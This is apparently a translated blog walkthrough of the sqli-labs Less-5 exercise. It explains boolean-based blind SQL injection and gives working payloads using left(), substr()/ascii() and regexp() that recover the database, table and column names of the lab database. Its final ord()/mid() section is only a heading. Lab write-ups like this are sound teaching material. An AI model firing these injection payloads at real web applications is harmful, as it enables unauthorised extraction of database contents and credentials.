Less5-Less6

    Less-5

    String type, single quote, boolean-based blind injection

    0x01 left()

    left(database(),1)
    #left(a,b) returns the leftmost b characters of string a
    
    ?id=1' and left(version(),1)=5--+
    

    Tests whether the first character of the version string is 5; if it is, the page prints "You are in".

    If it is not, the page prints nothing: that difference is the only oracle we get in this level, so every following request asks one yes/no question.

    Find the length of the database name (it is 8):

    ?id=1' and length(database())=8--+
    


    Test whether the first character of the database name is greater than 'a':

    ?id=1' and left(database(),1)>'a'--+
    


    Test whether the first two characters are greater than 'sa', and keep narrowing the range this way until the database name is determined to be security. Note that this is a string comparison under the column's collation, which on a default MySQL install is case-insensitive, so 'S' and 's' cannot be told apart by this test alone.

    ?id=1' and left(database(),2)>'sa'--+
    

    0x02 substr()

    substr(string,start,length)
    #takes length characters of string, beginning at position start (1-based)
    

    Guess the table names. Using ascii() together with substr(), test the first character of the first table name; 101 is 'e', the first letter of the emails table.

    ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+
    


    Test the second character (109 is 'm'), and continue position by position until the first table name, emails, is fully recovered.

    ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109--+
    


    For the second table, change limit 0,1 to limit 1,1 (114 is 'r'); repeat until every table name has been recovered.

    ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114--+
    

    0x03 regexp()

    regexp '^[a-z]' limit 0,1
    #tests whether the first character is one of a-z; the match evaluates to 1 if so, otherwise 0
    

    Determine the column names. The subquery returns 1 only when some column of users matches the pattern, so 1=(...) is true exactly when the guessed prefix is right:

    ?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)--+
    

    Confirm that the first column name is username:

    ?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)--+
    

    Confirm that the second column name is password:

    ?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^password' limit 0,1)--+
    

    0x04 ord(),mid()

Original: https://www.cnblogs.com/observering/p/13443105.html